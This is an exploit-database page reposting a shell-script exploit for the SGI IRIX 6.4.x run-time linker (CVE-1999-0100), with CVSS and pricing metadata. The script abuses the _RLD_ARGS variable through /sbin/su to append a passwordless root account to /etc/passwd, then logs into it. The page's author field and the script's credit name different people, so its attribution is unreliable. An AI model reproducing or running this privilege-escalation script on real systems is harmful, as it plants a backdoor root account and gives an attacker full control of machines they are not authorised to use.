Advertisement






SGI IRIX 6.4.x Run-Time Linker Arbitrary File Creation

CVE Category Price Severity
CVE-1999-0100 CWE-427 $10,000 High
Author Risk Exploitation Type Date
Rain Forest Puppy High Local 2019-04-29
CPE
cpe:cpe:/o:sgi:irix:6.4
CVSS EPSS EPSSP
CVSS:4.0/AV:A/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019040263

Below is a copy:

SGI IRIX 6.4.x Run-Time Linker Arbitrary File Creation
#!/bin/sh 
# SGI IRIX <= 6.4.x run-time linker (rld) arbitrary file creation exploit
# =======================================================================
# The IRIX run-time linker on all versions prior to 6.5 does not properly
# scrub environment variables when executing binaries with privilege or
# capabilities. A malicious user can leverage this to create files as the
# "root" user and partially control the contents. 
#
# -- HackerFantastic (https://hacker.house)
#
echo "echo w00t::0:0:greetz:/:/bin/csh >> /etc/passwd" > /tmp/.x.sh
chmod 755 /tmp/.x.sh
_RLD_ARGS="-log /.cshrc |/tmp/.x.sh" /sbin/su
last -3 root
echo "[ waiting 5mins for root to login..."
sleep 300
su - w00t

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum